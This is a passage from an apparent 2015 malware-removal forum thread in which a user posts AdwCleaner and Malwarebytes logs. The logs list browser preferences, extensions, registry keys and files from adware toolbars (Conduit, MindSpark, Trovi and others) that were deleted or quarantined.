[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appState_Find-a-Pro.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appState_PopBITGames", "6F6E");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appState_PopBITGames.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appState_PriceGong", "6F6E");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appState_PriceGong.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appState_WindowShopper", "6F6E");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appState_WindowShopper.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appsConfig.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appsDefaultEnabled", "6E756C6C");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appsDefaultEnabled.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_calledSetupService", "31");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_calledSetupService.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_currentVersion", "312E31332E302E3137");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_currentVersion.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_existingUsersRecoveryDone", "31");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_existingUsersRecoveryDone.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_first_time", "31");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_first_time.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_lastLoginTime", "31343431313032383132333737");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_lastLoginTime.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_localization.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_mamEnabled", "74727565");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_mamEnabled.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_migrated_from_ls", "31");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_migrated_from_ls.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_new_welcome_experience", "31");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_new_welcome_experience.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_settings1.13.0.17.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_showWelcomeGadget", "66616C7365");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_showWelcomeGadget.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_stamp", "313139395F30");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_stamp.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_userBornDate", "4E2F41");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_userBornDate.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_userId", "36613165616663632D353036652D346638342D623066362D623031643365666138313364");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_userId.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_user_approval_interacted", "31");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_user_approval_interacted.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_welcomeDialogMode", "31");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_welcomeDialogMode.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.url_history0001.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("{7D4F1959-3F72-49d5-8E59-F02F8AA6815D}.ScriptData_WSG_blackList", "form=CONTLBbabsrc=toolbarbabsrc=tb_ssinvocationType=tb50-ie-aolsoftonic-tbsbox-en-usinvocationType=tb50-ff-aolsoftonic[...]
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("{7D4F1959-3F72-49d5-8E59-F02F8AA6815D}.ScriptData_WSG_whiteList", "{\"search.babylon.com\":\"q\",\"search.imesh.net\":\"q\",\"www.search-results.com\":\"q\",\"home.mywebsearch.com\":\"searc[...]
[-] [C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : feed.helperbar.com
[-] [C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : wayfair.com
[-] [C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : search.ask.com
[-] [C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : aol.com
[-] [C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : ask.com
[-] [C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : aaaaaiabcopkplhgaedhbloeejhhankf
[-] [C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : abepbblpkilpjohncjbccmdjhdhbnhdj
[-] [C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : booedmolknjekdopkepjjeckmjkdpfgl
[-] [C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : fjoijdanhaiflhibkljeklcghcmmfffh
[-] [C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : flpcjncodpafbgdpnkljologafpionhb
[-] [C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : gafhhbahpojnjfhpepjjfjojbphnogmn
[-] [C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : mcbkbpnkkkipelfledbfocopglifcfmi
[-] [C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : mppnoffgpafgpgbaigljliadgbnhljfl
[-] [C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : nafaimnnclfjfedmmabolbppcngeolgf

*************************

:: Winsock settings cleared

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [95108 bytes] ##########
kfoxsr is offline  
Old 09-18-2015, 10:47 AM   #9
Registered Member
 
Join Date: Sep 2015
Posts: 13
OS: windows 10



Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 9/18/2015
Scan Time: 12:02 PM
Logfile: MBAM results file.txt
Administrator: Yes

Version: 2.1.8.1057
Malware Database: v2015.09.18.07
Rootkit Database: v2015.08.16.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Ken Terry

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 452214
Time Elapsed: 28 min, 25 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 42
Adware.DealCabby, HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{0B4A07CF-45EB-4B10-B6BB-35568A2F89BE}, Quarantined, [6af5d1601a71e2549053f1e9a26013ed],
PUP.Optional.MindSpark, HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{5D79F641-C168-40DF-A32F-BACEA7509E75}, Quarantined, [431ce24fb2d996a0c038479de022639d],
PUP.Optional.MindSpark, HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{5D79F641-C168-40DF-A32F-BACEA7509E75}, Quarantined, [431ce24fb2d996a0c038479de022639d],
PUP.Optional.ProtectedTB, HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{c5c4fd2c-c7ac-492c-a689-2e0843ba4e55}, Quarantined, [f36cde536625cc6add3ac126e51d639d],
PUP.Optional.ProtectedTB, HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{C5C4FD2C-C7AC-492C-A689-2E0843BA4E55}, Quarantined, [f36cde536625cc6add3ac126e51d639d],
PUP.Optional.MindSpark, HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{C98D5B61-B0EA-4D48-9839-1079D352D880}, Quarantined, [154aa38efe8dfe383a8f618419e9ea16],
PUP.Optional.MindSpark, HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{C98D5B61-B0EA-4D48-9839-1079D352D880}, Quarantined, [154aa38efe8dfe383a8f618419e9ea16],
PUP.Optional.MindSpark, HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{CB41FC95-F1B3-4797-8BB6-1012FF62ABBA}, Quarantined, [b8a79a97ed9ec076448705e0f50dfe02],
PUP.Optional.MindSpark, HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{CB41FC95-F1B3-4797-8BB6-1012FF62ABBA}, Quarantined, [b8a79a97ed9ec076448705e0f50dfe02],
PUP.Optional.Conduit, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{06aedb90-98b2-4989-ad0f-39d53551f6ad}, Quarantined, [98c7dd5497f4ef47af22af328b7752ae],
PUP.Optional.AppGraffiti, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{6F6A5334-78E9-4D9B-8182-8B41EA8C39EF}, Quarantined, [68f7b47d9af159ddbc218b55fc06d828],
PUP.Optional.InboxToolBar, HKLM\SOFTWARE\CLASSES\Inbox.InboxServer, Quarantined, [70efa38e3e4db87ed3b66182768cfb05],
PUP.Optional.InboxToolBar, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Inbox.InboxServer, Quarantined, [f06f0d24d2b9de583752786b57ab857b],
PUP.Optional.InboxToolBar, HKLM\SOFTWARE\CLASSES\WOW6432NODE\Inbox.InboxServer, Quarantined, [f06f0d24d2b9de583752786b57ab857b],
PUP.Optional.SingALong, HKLM\SOFTWARE\CLASSES\INTERFACE\{D929B5F2-1CF3-4564-9A03-FC3FDD588064}, Quarantined, [c59a76bb7e0d5bdb4ab19552b34f52ae],
PUP.Optional.SingALong, HKLM\SOFTWARE\CLASSES\TypeLib\{93F03FA6-C8F8-4850-B304-38ECC85ED3AB}, Quarantined, [0758ae83c4c7dc5a53a8f5f22ed4aa56],
PUP.Optional.SingALong, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{D929B5F2-1CF3-4564-9A03-FC3FDD588064}, Quarantined, [0758ae83c4c7dc5a53a8f5f22ed4aa56],
PUP.Optional.SingALong, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{D929B5F2-1CF3-4564-9A03-FC3FDD588064}, Quarantined, [0758ae83c4c7dc5a53a8f5f22ed4aa56],
PUP.Optional.SingALong, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TypeLib\{93F03FA6-C8F8-4850-B304-38ECC85ED3AB}, Quarantined, [3a2540f1800bc0764daefaedfc06dd23],
PUP.Optional.SingALong, HKLM\SOFTWARE\CLASSES\WOW6432NODE\TypeLib\{93F03FA6-C8F8-4850-B304-38ECC85ED3AB}, Quarantined, [2639dc557d0e89adfcffaa3d936fa55b],
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\SPVC32LDR, Quarantined, [3c23ee435a3160d65784f7c8b84cb14f],
PUP.Optional.SearchProtect, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}, Quarantined, [8ad553de95f6b38376a1244b37cdc739],
PUP.Optional.SearchProtect, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{cf2797aa-b7ec-e311-8ed9-005056c00008}, Quarantined, [80dff63b612a89ad75a1145b897bb14f],
PUP.Optional.TelevisionFanatic, HKLM\SOFTWARE\WOW6432NODE\TelevisionFanatic, Quarantined, [035cb0818a0178be1221c6f80004d927],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\KNHPKJJDBJJCHGLNOPHLNGHCDEFPANLC, Quarantined, [035c4ae74b4085b10118e94730d3956b],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\NATIVEMESSAGINGHOSTS\nmhostct3309762, Quarantined, [3e215cd5533872c4b2cfa38c9c6720e0],
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{0328B630-EA94-4FA3-9F27-8250B6324DDB}, Quarantined, [2738cd648803b97de7ff35725aaa32ce],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{796E740E-337F-439F-B200-86BE4DEC59F9}, Quarantined, [233c59d86b20092d347f6a221ce83ec2],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{9E0FE23E-1410-457B-A70C-3E9C64BFF5BC}, Quarantined, [92cdb8798803f4428132ed9f9e66c838],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{A6B867BF-D073-49CD-8935-CD2616AA6B9B}, Quarantined, [9dc266cb3457181e1e95cac2a262c43c],
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{D09094B3-B426-4F16-A6D9-E211FE222127}, Quarantined, [fc638da41f6cc96dd4124f58c83c1ae6],
PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{11D4FAA0-A577-4FA8-B24E-D24283D861D1}, Quarantined, [5f00f04196f54ee86fee1d854db7e818],
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MOZILLAPLUGINS\@TelevisionFanatic.com/Plugin, Quarantined, [3c235fd2ed9eef47c246317756aec43c],
PUP.Optional.TweakBit, HKLM\SOFTWARE\WOW6432NODE\TWEAKBIT\ATPopups, Quarantined, [c39c46eb4f3c1e18b2c0952bc143ff01],
PUP.Optional.TweakBit, HKLM\SOFTWARE\WOW6432NODE\TWEAKBIT\ATUpdaters, Quarantined, [2e312d046d1ea591f280a41c9d67fc04],
PUP.Optional.TweakBit, HKLM\SOFTWARE\WOW6432NODE\TWEAKBIT\Google Analytics Package, Quarantined, [ee71d0610c7f70c60d67f3cdf50fd62a],
PUP.Optional.DealCabby, HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\APPDATALOW\SOFTWARE\DealCabby, Quarantined, [c897013095f69f974f845c3560a46c94],
PUP.Optional.MindSpark, HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\APPDATALOW\SOFTWARE\TelevisionFanatic, Quarantined, [a1bee0514348a195700a1d89bd47847c],
PUP.Optional.ConduitTB.Gen, HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\KNHPKJJDBJJCHGLNOPHLNGHCDEFPANLC, Quarantined, [e57a10217e0d201654c6ba76fe05b947],
PUP.Optional.ConduitTB.Gen, HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\GOOGLE\CHROME\NATIVEMESSAGINGHOSTS\nmhostct3309762, Quarantined, [6df233feb5d6e84e0874cd624db652ae],
PUP.Optional.ConduitTB.Gen, HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CHCT3309762, Quarantined, [510e5dd452394bebf0870e6a37cd0000],
PUP.Optional.ConduitTB.Gen, HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\SMARTBAR\UninstallerData, Quarantined, [2a3562cfd4b74bebdaa68da2f2118e72],

Registry Values: 13
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\chrome.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130542244987357055, Quarantined, [a4bbbd745f2cfb3bf7e315aaba4a43bd]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\explorer.xxx|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130542244987357055, Quarantined, [5f0063ce8803f6406773d5ea9d67ef11]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\firefox.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130542244987357055, Quarantined, [b8a7c1704c3ffd396b6ff2cda65ec53b]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\iexplore.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130542244987357055, Quarantined, [c39cfd34f59638fe77631fa0ae5623dd]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\SPVC32Ldr|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130542244987357055, Quarantined, [3c23ee435a3160d65784f7c8b84cb14f]
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\knhpkjjdbjjchglnophlnghcdefpanlc|path, C:\Users\Ken Terry\AppData\Local\CRE\knhpkjjdbjjchglnophlnghcdefpanlc.crx, Quarantined, [035c4ae74b4085b10118e94730d3956b]
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{0328b630-ea94-4fa3-9f27-8250b6324ddb}|AppPath, C:\Program Files (x86)\TelevisionFanatic\bar\1.bin, Quarantined, [2738cd648803b97de7ff35725aaa32ce]
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{796E740E-337F-439F-B200-86BE4DEC59F9}|AppPath, C:\Users\Ken Terry\AppData\Local\Conduit\CT3309762, Quarantined, [233c59d86b20092d347f6a221ce83ec2]
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{9E0FE23E-1410-457B-A70C-3E9C64BFF5BC}|AppPath, C:\Users\Ken Terry\AppData\Local\Conduit\CT3298569, Quarantined, [92cdb8798803f4428132ed9f9e66c838]
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{A6B867BF-D073-49CD-8935-CD2616AA6B9B}|AppPath, C:\Users\Ken Terry\AppData\Local\Conduit\CT3289847, Quarantined, [9dc266cb3457181e1e95cac2a262c43c]
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{d09094b3-b426-4f16-a6d9-e211fe222127}|AppPath, C:\Program Files (x86)\TelevisionFanatic\bar\1.bin, Quarantined, [fc638da41f6cc96dd4124f58c83c1ae6]
PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{11D4FAA0-A577-4FA8-B24E-D24283D861D1}|Publisher, Linkury Inc., Quarantined, [5f00f04196f54ee86fee1d854db7e818]
PUP.Optional.ConduitTB.Gen, HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\knhpkjjdbjjchglnophlnghcdefpanlc|path, C:\Users\Ken Terry\AppData\Local\CRE\knhpkjjdbjjchglnophlnghcdefpanlc.crx, Quarantined, [e57a10217e0d201654c6ba76fe05b947]

Registry Data: 0
(No malicious items detected)

Folders: 14
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Local\CRE, Quarantined, [055af43d3259c5719880af81b152c739],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\toolbarImages, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\Settings, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MixiDJToolbar, C:\Users\Ken Terry\AppData\LocalLow\MixiDJ_V33, Quarantined, [b0afd45dcfbc181e71560715be45d927],
PUP.Optional.MixiDJToolbar, C:\Users\Ken Terry\AppData\LocalLow\MixiDJ_V33\Logs, Quarantined, [b0afd45dcfbc181e71560715be45d927],
PUP.Optional.WhiteSmoke, C:\Users\Ken Terry\AppData\LocalLow\WhiteSmoke_New, Quarantined, [e679c36ec0cb3105ed5fcb5ff2112fd1],
PUP.Optional.WhiteSmoke, C:\Users\Ken Terry\AppData\LocalLow\WhiteSmoke_New\Logs, Quarantined, [e679c36ec0cb3105ed5fcb5ff2112fd1],

Files: 202
PUP.Optional.APNToolBar, C:\Users\Ken Terry\Downloads\WeatherBugSetup.exe, Quarantined, [530c6ac7a8e3db5b72b15b5e13ee34cc],
PUP.Optional.SnapDo, C:\Windows\Installer\22b98a99.msi, Quarantined, [2f305cd5bfccd26465eb08b720e1e61a],
